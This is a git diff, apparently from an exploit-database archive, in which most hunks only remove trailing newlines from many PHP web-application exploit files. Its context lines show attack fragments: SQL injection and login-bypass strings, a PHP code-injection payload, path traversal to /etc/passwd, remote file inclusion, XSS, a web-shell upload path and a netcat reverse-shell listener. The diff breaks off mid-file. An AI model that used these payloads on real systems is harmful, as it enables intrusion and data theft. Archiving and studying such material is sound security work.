b/platforms/php/webapps/4072.txt index ea0a1a0f9..e115ebba0 100755 --- a/platforms/php/webapps/4072.txt +++ b/platforms/php/webapps/4072.txt @@ -54,4 +54,4 @@ www.hach-teach.org - www.3asfh.com BY : o0xxdark0o o0xxdark0o@msn.com -# milw0rm.com [2007-06-14] +# milw0rm.com [2007-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/40723.txt b/platforms/php/webapps/40723.txt index 1dc431d2d..58db1c014 100755 --- a/platforms/php/webapps/40723.txt +++ b/platforms/php/webapps/40723.txt @@ -59,6 +59,4 @@ Content-Length: 2601 POST Content: data[]=";exec('calc.exe');echo+"1&data[]=All&data[]=Read+Info&data[]=Contact+us&data[]=Login&data[]=Sign+Up&data[]=Home&data[]=Please+Fill+Required+Fields&data[]=Map&data[]=Contact+form&data[]=Full+Name&data[]=Email+address&data[]=Subject&data[]=Request&data[]=Send+email&data[]=Some+Tips&data[]=This+form+is+just+for+who+is+already+our+website's+member!&data[]=If+you+don't+have+any+account+and+didn't+sign+in+before,+use+the+below+link+before+use+this+form!&data[]=You+can+use+your+email+address+or+username+for+sign.&data[]=Username+or+Email&data[]=Email&data[]=Password&data[]=Keep+me+logged+in&data[]=Sign+in&data[]=I+forgot+My+Password&data[]=Please+enter+a+username+or+email+address.&data[]=Please+enter+your+password.&data[]=Register&data[]=Quick+Registration&data[]=You+can+enter+your+email+address+using+the+box+below,+and+get+the+latest+news!&data[]=Enter+your+email+address&data[]=Register+now&data[]=Please+enter+a+valid+email+address.&data[]=Search&data[]=Comments&data[]=Please+send+us+your+feedback&data[]=Read+More&data[]=Search+result&data[]=loading...&data[]=Username+or+password+not+correct&data[]=Forget+password&data[]=Return+password&data[]=If+you+forgot+your+password,+you+can+enter+the+email+address+you+used+to+register+below.+You'll+receive+an+email+from+us+which+you+can+use+to+retrieve+your+password.&data[]=Submit&data[]=This+email+already+exists,+choose+another+email+address+or+click+on+forget+password.&data[]=We+made+a+new+account+for+you,+for+active+your+it+and+choose+your+password+click+on+this+link&data[]=Your+request+is+not+valid.&data[]=Set+password&data[]=Please+provide+a+password&data[]=Your+password+must+be+at+least+6+characters+long&data[]=Please+enter+the+same+password+as+above&data[]=We+send+you+a+link+to+your+email,+please+check+your+email+inbox+and+spam,+and+flow+that.&data[]=Login+now&data[]=Back+to+home&data[]=Choose+your+new+password&data[]=Insert+your+new+password&data[]=Insert+your+new+password+again&data[]=Confirm+your+account&data[]=Change+password+confirmation!&data[]=Your+account+is+active+now.&data[]=Password+Reset&data[]=Change+pass&data[]=Log+Out&data[]=Change+password&data[]=Change+Passwrod&data[]=Last+Password&data[]=New+password&data[]=Password+Confirm&data[]=Cancel&data[]=Last+password+not+correct ---> - - +--> \ No newline at end of file diff --git a/platforms/php/webapps/40725.txt b/platforms/php/webapps/40725.txt index 7a93dd397..69c2c302b 100755 --- a/platforms/php/webapps/40725.txt +++ b/platforms/php/webapps/40725.txt @@ -126,4 +126,4 @@ tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: -https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \ No newline at end of file diff --git a/platforms/php/webapps/4074.txt b/platforms/php/webapps/4074.txt index d6b3dd61d..f8283b309 100755 --- a/platforms/php/webapps/4074.txt +++ b/platforms/php/webapps/4074.txt @@ -49,4 +49,4 @@ CODE: BY : o0xxdark0o o0xxdark0o@msn.com -# milw0rm.com [2007-06-16] +# milw0rm.com [2007-06-16] \ No newline at end of file diff --git a/platforms/php/webapps/40749.txt b/platforms/php/webapps/40749.txt index c030eead4..bcf2a26ab 100755 --- a/platforms/php/webapps/40749.txt +++ b/platforms/php/webapps/40749.txt @@ -224,4 +224,4 @@ tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 -10365 Berlin, Germany +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/php/webapps/4075.txt b/platforms/php/webapps/4075.txt index a1ab386a3..6d23511ae 100755 --- a/platforms/php/webapps/4075.txt +++ b/platforms/php/webapps/4075.txt @@ -16,4 +16,4 @@ Note : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda] /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// -# milw0rm.com [2007-06-17] +# milw0rm.com [2007-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/40750.txt b/platforms/php/webapps/40750.txt index 6a1841959..121019cba 100755 --- a/platforms/php/webapps/40750.txt +++ b/platforms/php/webapps/40750.txt @@ -76,4 +76,4 @@ Disclosure timeline 2/11 - Vendor sent fixation to review 3/11 - Fixed evrsion was retested by me and approved 3/11 - Vendor scheduled official update release -10/11 - Public disclosure +10/11 - Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/40752.py b/platforms/php/webapps/40752.py index 8cfd94f9f..c50231608 100755 --- a/platforms/php/webapps/40752.py +++ b/platforms/php/webapps/40752.py @@ -24,4 +24,4 @@ data =3D urllib.urlencode({'user_id': user_id,=20 =09=09=09 'btn_new_password' : '1'}) req =3D urllib2.Request(baseUrl + 'index.php/sessions/passwordreset', data) -response =3D urllib2.urlopen(req) +response =3D urllib2.urlopen(req) \ No newline at end of file diff --git a/platforms/php/webapps/40755.html b/platforms/php/webapps/40755.html index 3fa2d5ade..da96821cc 100755 --- a/platforms/php/webapps/40755.html +++ b/platforms/php/webapps/40755.html @@ -214,4 +214,4 @@ Link to download patch: http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml --------------------------------------------------------------------------- -  +  \ No newline at end of file diff --git a/platforms/php/webapps/40756.py b/platforms/php/webapps/40756.py index 2c82ec21b..dc9803780 100755 --- a/platforms/php/webapps/40756.py +++ b/platforms/php/webapps/40756.py @@ -88,4 +88,4 @@ while True: print urllib2.urlopen(req).read() data = urllib.urlencode({'0x4148':request.encode('base64')}) req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data) - print urllib2.urlopen(req).read() + print urllib2.urlopen(req).read() \ No newline at end of file diff --git a/platforms/php/webapps/4076.php b/platforms/php/webapps/4076.php index e240dd962..35a60010d 100755 --- a/platforms/php/webapps/4076.php +++ b/platforms/php/webapps/4076.php @@ -182,4 +182,4 @@ print "Go To Target And Login By This\r\nuser : dj7xpl / pass : dj7xpl and see ?> -# milw0rm.com [2007-06-17] +# milw0rm.com [2007-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/40771.txt b/platforms/php/webapps/40771.txt index 7a1d7eb99..8497ea69f 100755 --- a/platforms/php/webapps/40771.txt +++ b/platforms/php/webapps/40771.txt @@ -28,4 +28,4 @@ http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wo -- Atenciosamente -Lenon Leite +Lenon Leite \ No newline at end of file diff --git a/platforms/php/webapps/40772.txt b/platforms/php/webapps/40772.txt index d1e0cfb73..3865f6a7b 100755 --- a/platforms/php/webapps/40772.txt +++ b/platforms/php/webapps/40772.txt @@ -34,4 +34,4 @@ Update to version 1.3.2 -- Atenciosamente -Lenon Leite +Lenon Leite \ No newline at end of file diff --git a/platforms/php/webapps/40776.txt b/platforms/php/webapps/40776.txt index 820422387..8cd8055b0 100755 --- a/platforms/php/webapps/40776.txt +++ b/platforms/php/webapps/40776.txt @@ -141,6 +141,4 @@ authors or managers. To record, list, modify, use or edit our material contact ( -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/4078.php b/platforms/php/webapps/4078.php index 5a51c116d..523cc0d70 100755 --- a/platforms/php/webapps/4078.php +++ b/platforms/php/webapps/4078.php @@ -167,4 +167,4 @@ $uname Hash is: $password"; # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-06-18] +# milw0rm.com [2007-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/40783.txt b/platforms/php/webapps/40783.txt index 172d6b361..fda0f9744 100755 --- a/platforms/php/webapps/40783.txt +++ b/platforms/php/webapps/40783.txt @@ -32,4 +32,4 @@ http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-s -- Atenciosamente -Lenon Leite +Lenon Leite \ No newline at end of file diff --git a/platforms/php/webapps/4079.txt b/platforms/php/webapps/4079.txt index ba5ddb016..0aea00e76 100755 --- a/platforms/php/webapps/4079.txt +++ b/platforms/php/webapps/4079.txt @@ -15,4 +15,4 @@ site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt? greets to : www.islam-attack.com ======================================================= -# milw0rm.com [2007-06-18] +# milw0rm.com [2007-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/40795.html b/platforms/php/webapps/40795.html index 39666d5d3..edead4bed 100755 --- a/platforms/php/webapps/40795.html +++ b/platforms/php/webapps/40795.html @@ -68,4 +68,4 @@ Have an authenticated admin visit a webpage with the following form: - + \ No newline at end of file diff --git a/platforms/php/webapps/40802.txt b/platforms/php/webapps/40802.txt index 07a6ee4ed..df78102ad 100755 --- a/platforms/php/webapps/40802.txt +++ b/platforms/php/webapps/40802.txt @@ -106,4 +106,4 @@ tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 -10365 Berlin, Germany +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/php/webapps/40804.txt b/platforms/php/webapps/40804.txt index c95d8ddda..4efd18793 100755 --- a/platforms/php/webapps/40804.txt +++ b/platforms/php/webapps/40804.txt @@ -111,9 +111,4 @@ oshingler 11. CVE number: -Not existing - - - - - +Not existing \ No newline at end of file diff --git a/platforms/php/webapps/40809.txt b/platforms/php/webapps/40809.txt index f5f68c8d0..ffbd2b2a1 100755 --- a/platforms/php/webapps/40809.txt +++ b/platforms/php/webapps/40809.txt @@ -181,4 +181,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/4081.php b/platforms/php/webapps/4081.php index fa6dc6788..799fe2852 100755 --- a/platforms/php/webapps/4081.php +++ b/platforms/php/webapps/4081.php @@ -222,4 +222,4 @@ if($exploit==1){ } ?> -# milw0rm.com [2007-06-19] +# milw0rm.com [2007-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/4082.pl b/platforms/php/webapps/4082.pl index 4f6b88468..781750ac0 100755 --- a/platforms/php/webapps/4082.pl +++ b/platforms/php/webapps/4082.pl @@ -142,4 +142,4 @@ sub usage( ) exit(0); } -# milw0rm.com [2007-06-20] +# milw0rm.com [2007-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/40826.py b/platforms/php/webapps/40826.py index 917e4fd2c..9ffe7e86b 100755 --- a/platforms/php/webapps/40826.py +++ b/platforms/php/webapps/40826.py @@ -165,4 +165,4 @@ def main(): print '[+] Completed.\n' if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/php/webapps/4084.txt b/platforms/php/webapps/4084.txt index 79fb95415..044ca616e 100755 --- a/platforms/php/webapps/4084.txt +++ b/platforms/php/webapps/4084.txt @@ -28,4 +28,4 @@ http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_ji # Sp.Thanx To : Tryag-Team & Asb-May's Team -# milw0rm.com [2007-06-20] +# milw0rm.com [2007-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/4085.txt b/platforms/php/webapps/4085.txt index 4c1fd19ca..aa74a1654 100755 --- a/platforms/php/webapps/4085.txt +++ b/platforms/php/webapps/4085.txt @@ -28,4 +28,4 @@ # Sp.Thanx To : Tryag-Team & Asb-May's Team -# milw0rm.com [2007-06-20] +# milw0rm.com [2007-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/40850.txt b/platforms/php/webapps/40850.txt index ca3a537cf..8c4cd8b7b 100755 --- a/platforms/php/webapps/40850.txt +++ b/platforms/php/webapps/40850.txt @@ -25,6 +25,4 @@ http://Target/?wpv-image=../../../../../../../../../../etc/passwd 3 - Timeline: 12/11/2016 - Discovered -12/11/2016 - vendor not found - - +12/11/2016 - vendor not found \ No newline at end of file diff --git a/platforms/php/webapps/40851.txt b/platforms/php/webapps/40851.txt index e16959f7d..2e396f0f7 100755 --- a/platforms/php/webapps/40851.txt +++ b/platforms/php/webapps/40851.txt @@ -66,5 +66,4 @@ Exploit Code: • [*] shutting down at 16:48:10 • -Advisory: http://www.vapidlabs.com/advisory.php?v=171 - +Advisory: http://www.vapidlabs.com/advisory.php?v=171 \ No newline at end of file diff --git a/platforms/php/webapps/4086.pl b/platforms/php/webapps/4086.pl index f12ca0e91..4c7bc93d5 100755 --- a/platforms/php/webapps/4086.pl +++ b/platforms/php/webapps/4086.pl @@ -61,4 +61,4 @@ else { $data=get($kw3); print $data ; } } -# milw0rm.com [2007-06-20] +# milw0rm.com [2007-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/40882.txt b/platforms/php/webapps/40882.txt index 1890a82b1..15348a5b6 100755 --- a/platforms/php/webapps/40882.txt +++ b/platforms/php/webapps/40882.txt @@ -41,4 +41,4 @@ Content-Length: 107 Connection: close Content-Type: text/html; charset=UTF-8 - + \ No newline at end of file diff --git a/platforms/php/webapps/4089.pl b/platforms/php/webapps/4089.pl index 2ecf33fe1..87548694d 100755 --- a/platforms/php/webapps/4089.pl +++ b/platforms/php/webapps/4089.pl @@ -73,4 +73,4 @@ else { $data=get($kw3); print $data ; } } -# milw0rm.com [2007-06-21] +# milw0rm.com [2007-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/4090.pl b/platforms/php/webapps/4090.pl index 1c2564c3e..53d990f8d 100755 --- a/platforms/php/webapps/4090.pl +++ b/platforms/php/webapps/4090.pl @@ -60,4 +60,4 @@ else { $data=get($kw3); print $data ; } } -# milw0rm.com [2007-06-22] +# milw0rm.com [2007-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/40904.txt b/platforms/php/webapps/40904.txt index 552493d34..371acba1e 100755 --- a/platforms/php/webapps/40904.txt +++ b/platforms/php/webapps/40904.txt @@ -24,4 +24,4 @@ login_master limit 0,1 ))-- - So an user can fetch admin details and can easily get root on that server if server is SmartGuard 6.0A Revolutions as php runs as user root by default. -This this vulnerability can make whole server vulnerable . +This this vulnerability can make whole server vulnerable . \ No newline at end of file diff --git a/platforms/php/webapps/4091.txt b/platforms/php/webapps/4091.txt index 18685f551..3b835eed2 100755 --- a/platforms/php/webapps/4091.txt +++ b/platforms/php/webapps/4091.txt @@ -30,4 +30,4 @@ # Sp.Thanx To : Tryag-Team & Asb-May's Group -# milw0rm.com [2007-06-22] +# milw0rm.com [2007-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/40912.txt b/platforms/php/webapps/40912.txt index 5f4c62492..82816073b 100755 --- a/platforms/php/webapps/40912.txt +++ b/platforms/php/webapps/40912.txt @@ -96,4 +96,4 @@ DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5). -- Elar Lang Blog @ https://security.elarlang.eu -Pentester, lecturer @ http://www.clarifiedsecurity.com +Pentester, lecturer @ http://www.clarifiedsecurity.com \ No newline at end of file diff --git a/platforms/php/webapps/4092.txt b/platforms/php/webapps/4092.txt index 2f9487a24..fe4e5f1fd 100755 --- a/platforms/php/webapps/4092.txt +++ b/platforms/php/webapps/4092.txt @@ -184,4 +184,4 @@ to use it UNPATCHED regards laurent gaffie contact : laurent.gaffie@gmail.com -# milw0rm.com [2007-06-22] +# milw0rm.com [2007-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/40941.txt b/platforms/php/webapps/40941.txt index 68d19cc67..c2d968855 100755 --- a/platforms/php/webapps/40941.txt +++ b/platforms/php/webapps/40941.txt @@ -25,4 +25,4 @@ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp-settings-time-1=1480877693 -Connection: close* +Connection: close* \ No newline at end of file diff --git a/platforms/php/webapps/4095.txt b/platforms/php/webapps/4095.txt index b97a260d2..c5ad19f35 100755 --- a/platforms/php/webapps/4095.txt +++ b/platforms/php/webapps/4095.txt @@ -37,4 +37,4 @@ GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org --==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- --==+================================================================================+==-- -# milw0rm.com [2007-06-24] +# milw0rm.com [2007-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/4096.php b/platforms/php/webapps/4096.php index 848da5c8b..31a43f581 100755 --- a/platforms/php/webapps/4096.php +++ b/platforms/php/webapps/4096.php @@ -949,4 +949,4 @@ class phpsploit } ?> -# milw0rm.com [2007-06-24] +# milw0rm.com [2007-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/40969.pl b/platforms/php/webapps/40969.pl index 27c9d6856..065e143fb 100755 --- a/platforms/php/webapps/40969.pl +++ b/platforms/php/webapps/40969.pl @@ -60,5 +60,4 @@ post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': data = urllib.urlencode(post_fields) req = urllib2.Request(url, data) response = urllib2.urlopen(req) -the_page = response.read() - +the_page = response.read() \ No newline at end of file diff --git a/platforms/php/webapps/4097.txt b/platforms/php/webapps/4097.txt index 92bac274d..31478f858 100755 --- a/platforms/php/webapps/4097.txt +++ b/platforms/php/webapps/4097.txt @@ -14,4 +14,4 @@ http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL] #Thanks: str0ke -# milw0rm.com [2007-06-24] +# milw0rm.com [2007-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/40970.php b/platforms/php/webapps/40970.php index 930d1ce8e..274aa9157 100755 --- a/platforms/php/webapps/40970.php +++ b/platforms/php/webapps/40970.php @@ -72,4 +72,4 @@ if(!$mail->Send()) { echo "Message sent!\n"; } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/40971.txt b/platforms/php/webapps/40971.txt index 7a197dc28..cc463abef 100755 --- a/platforms/php/webapps/40971.txt +++ b/platforms/php/webapps/40971.txt @@ -59,6 +59,4 @@ Critical 21-Dec-2016 ­ informed the developer 28-Dec-2016 ­ release date of this security advisory -Not fixed at the date of submitting that exploit. - - +Not fixed at the date of submitting that exploit. \ No newline at end of file diff --git a/platforms/php/webapps/40972.php b/platforms/php/webapps/40972.php index 930a771c3..a591f4b7f 100755 --- a/platforms/php/webapps/40972.php +++ b/platforms/php/webapps/40972.php @@ -75,4 +75,4 @@ $message = Swift_Message::newInstance('Swift PoC exploit') // Send the message with PoC payload in 'from' field $result = $mailer->send($message); -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/40973.txt b/platforms/php/webapps/40973.txt index b35373cd5..34c1708b9 100755 --- a/platforms/php/webapps/40973.txt +++ b/platforms/php/webapps/40973.txt @@ -21,4 +21,4 @@ option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5) Update to version 2.6.1 from the update center of joomla. The Joomla vel publish the vulnerability on Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 -http://awebsupport.com/ +http://awebsupport.com/ \ No newline at end of file diff --git a/platforms/php/webapps/40976.txt b/platforms/php/webapps/40976.txt index d50d4f5c8..b7b6d6f0f 100755 --- a/platforms/php/webapps/40976.txt +++ b/platforms/php/webapps/40976.txt @@ -20,5 +20,4 @@ curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name. ex: -http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt - +http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt \ No newline at end of file diff --git a/platforms/php/webapps/40979.php b/platforms/php/webapps/40979.php index a6cfd72e8..5163ddc80 100755 --- a/platforms/php/webapps/40979.php +++ b/platforms/php/webapps/40979.php @@ -91,6 +91,4 @@ $message->setSubject('Zend PoC'); $transport = new \Zend\Mail\Transport\Sendmail(); $transport->send($message); -?> - - +?> \ No newline at end of file diff --git a/platforms/php/webapps/4098.php b/platforms/php/webapps/4098.php index 7a299caa3..39dc4cdc4 100755 --- a/platforms/php/webapps/4098.php +++ b/platforms/php/webapps/4098.php @@ -144,4 +144,4 @@ echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; echo "DEVIL TEAM HOME: http://devilteam.eu/\r\n"; ?> -# milw0rm.com [2007-06-24] +# milw0rm.com [2007-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/40986.py b/platforms/php/webapps/40986.py index 9a5eb6a3d..be4a68a08 100755 --- a/platforms/php/webapps/40986.py +++ b/platforms/php/webapps/40986.py @@ -202,7 +202,4 @@ os.system("nc -v -l -p %d" % args.ATTACKERS_PORT) print "\n[+] Shell closed\n" -print "\033[1;34mP.$. There's more to it :) Exiting, for now...\033[0m\n" - - - +print "\033[1;34mP.$. There's more to it :) Exiting, for now...\033[0m\n" \ No newline at end of file diff --git a/platforms/php/webapps/40987.txt b/platforms/php/webapps/40987.txt index 34fe82008..0833816d0 100755 --- a/platforms/php/webapps/40987.txt +++ b/platforms/php/webapps/40987.txt @@ -9,4 +9,4 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Navigate to scripts admin login page and submit ' or ''=' for username and password -it should give you access to the admin area. Enjoy >:) +it should give you access to the admin area. Enjoy >:) \ No newline at end of file diff --git a/platforms/php/webapps/4099.txt b/platforms/php/webapps/4099.txt index be01dba15..0e8aa9548 100755 --- a/platforms/php/webapps/4099.txt +++ b/platforms/php/webapps/4099.txt @@ -43,4 +43,4 @@ # ################################################################################################ -# milw0rm.com [2007-06-24] +# milw0rm.com [2007-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/40997.txt b/platforms/php/webapps/40997.txt index c4ad8a7f3..d15d7b038 100755 --- a/platforms/php/webapps/40997.txt +++ b/platforms/php/webapps/40997.txt @@ -26,4 +26,4 @@ Referer=javascript:prompt("XXS by justpentest"); Connection=keep-alive ---------------------------------------------------------------------------------------- Response: -

This page was linked to from javascript:prompt("XXS by justpentest");.

+

This page was linked to from javascript:prompt("XXS by justpentest");.

\ No newline at end of file diff --git a/platforms/php/webapps/40999.txt b/platforms/php/webapps/40999.txt index a1eb7d461..8d593b3df 100755 --- a/platforms/php/webapps/40999.txt +++ b/platforms/php/webapps/40999.txt @@ -29,5 +29,4 @@ http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(adm http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()-- -------------------------------------------------- -http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- - +http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- \ No newline at end of file diff --git a/platforms/php/webapps/4100.txt b/platforms/php/webapps/4100.txt index 283c8d593..3d8aa6aff 100755 --- a/platforms/php/webapps/4100.txt +++ b/platforms/php/webapps/4100.txt @@ -49,4 +49,4 @@ exemple of exploitation : laurent gaffie contact : laurent.gaffie@gmail.com -# milw0rm.com [2007-06-24] +# milw0rm.com [2007-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/41004.txt b/platforms/php/webapps/41004.txt index c11646b06..245a17624 100755 --- a/platforms/php/webapps/41004.txt +++ b/platforms/php/webapps/41004.txt @@ -19,4 +19,4 @@ # http://localhost/[PATH]/outgoing.php?linkid=[SQL] -Tunisia 4 ever +Tunisia 4 ever \ No newline at end of file diff --git a/platforms/php/webapps/41007.html b/platforms/php/webapps/41007.html index 45a82b792..f065465eb 100755 --- a/platforms/php/webapps/41007.html +++ b/platforms/php/webapps/41007.html @@ -28,4 +28,4 @@ -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41009.txt b/platforms/php/webapps/41009.txt index d741f113d..f94f1415b 100755 --- a/platforms/php/webapps/41009.txt +++ b/platforms/php/webapps/41009.txt @@ -36,4 +36,4 @@ Post data: Best Regards! -Ben Lee +Ben Lee \ No newline at end of file diff --git a/platforms/php/webapps/41010.txt b/platforms/php/webapps/41010.txt index 10b92e255..e9e17ce7b 100755 --- a/platforms/php/webapps/41010.txt +++ b/platforms/php/webapps/41010.txt @@ -11,4 +11,4 @@ http://software.friendsinwar.com/scripts_example/my_link_trader/ ######################### # SQL Injection/POC : # Vulnerable Parametre : id -# http://localhost/[PATH]/out.php?id=[SQL] +# http://localhost/[PATH]/out.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/4102.txt b/platforms/php/webapps/4102.txt index 500ef8f3e..d7b50290f 100755 --- a/platforms/php/webapps/4102.txt +++ b/platforms/php/webapps/4102.txt @@ -27,4 +27,4 @@ Mahmood_ali # Sp.Thanx To : Tryag-Team -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/41027.txt b/platforms/php/webapps/41027.txt index 0de5560e9..c3056a007 100755 --- a/platforms/php/webapps/41027.txt +++ b/platforms/php/webapps/41027.txt @@ -15,4 +15,4 @@ An attacker can exploit this vulnerability to read from the database. 2. SQL Injection / Proof of Concept: Vulnerable Parametre: id -http://localhost/[PATH]/see_more_details.php?id=[SQL] +http://localhost/[PATH]/see_more_details.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/41028.txt b/platforms/php/webapps/41028.txt index 6775a920a..f8db0d34e 100755 --- a/platforms/php/webapps/41028.txt +++ b/platforms/php/webapps/41028.txt @@ -13,4 +13,4 @@ Go to http://localhost/[PATH]/admin/index.php and set: Username: admin -Password: ' or '1'='1 +Password: ' or '1'='1 \ No newline at end of file diff --git a/platforms/php/webapps/41029.txt b/platforms/php/webapps/41029.txt index 5547d83b8..66a33df94 100755 --- a/platforms/php/webapps/41029.txt +++ b/platforms/php/webapps/41029.txt @@ -13,4 +13,4 @@ Go to http://localhost/[PATH]/admin/admin_login.php and set: Username: 1' or 1=1 -- - -Password: anything +Password: anything \ No newline at end of file diff --git a/platforms/php/webapps/4103.txt b/platforms/php/webapps/4103.txt index 3147baff4..5202680c7 100755 --- a/platforms/php/webapps/4103.txt +++ b/platforms/php/webapps/4103.txt @@ -45,4 +45,4 @@ FROM GM!: Kw3[R]ln get over it :D. --==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==-- --==+================================================================================+==-- -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/41034.txt b/platforms/php/webapps/41034.txt index 85f95c953..7c60e332e 100755 --- a/platforms/php/webapps/41034.txt +++ b/platforms/php/webapps/41034.txt @@ -14,4 +14,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]//notice-edit.php?aid=[SQL] # E.t.c.... Other files, too. There are security vulnerabilities. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4104.txt b/platforms/php/webapps/4104.txt index 2e00bcb69..dd4161270 100755 --- a/platforms/php/webapps/4104.txt +++ b/platforms/php/webapps/4104.txt @@ -38,4 +38,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/4105.txt b/platforms/php/webapps/4105.txt index 96bdce04f..aebce5116 100755 --- a/platforms/php/webapps/4105.txt +++ b/platforms/php/webapps/4105.txt @@ -35,4 +35,4 @@ Vuln. code: ShowImage.php [!] Greetz to Angeldust & Streets and to rest of community. -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/41054.txt b/platforms/php/webapps/41054.txt index f3b447ecd..3023e51f1 100755 --- a/platforms/php/webapps/41054.txt +++ b/platforms/php/webapps/41054.txt @@ -15,4 +15,4 @@ # http://localhost/[PATH]/admin/index.php?page=account/statussettings # http://localhost/[PATH]/admin/index.php?page=account/newad # Vs....... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4106.php b/platforms/php/webapps/4106.php index 0e45b5403..9e107f36f 100755 --- a/platforms/php/webapps/4106.php +++ b/platforms/php/webapps/4106.php @@ -164,4 +164,4 @@ print "Sh3ll : http://".$host."".$path."uploads/images/Filename <---Your File Na print "Example : http://localhost/blog/uploads/images/c99.php\r\n"; ?> -# milw0rm.com [2007-06-25] +# milw0rm.com [2007-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/41063.txt b/platforms/php/webapps/41063.txt index 6717716df..8056e37f6 100755 --- a/platforms/php/webapps/41063.txt +++ b/platforms/php/webapps/41063.txt @@ -17,4 +17,4 @@ # # Admin Login Bypass # http://localhost/[PATH]/adminlogin.php and set Mail:1@1.com and Password to 'or''=' and hit enter. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41064.txt b/platforms/php/webapps/41064.txt index cc70d2d75..283b6bca1 100755 --- a/platforms/php/webapps/41064.txt +++ b/platforms/php/webapps/41064.txt @@ -17,4 +17,4 @@ # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4107.txt b/platforms/php/webapps/4107.txt index 83d1d6e6f..63d9aa561 100755 --- 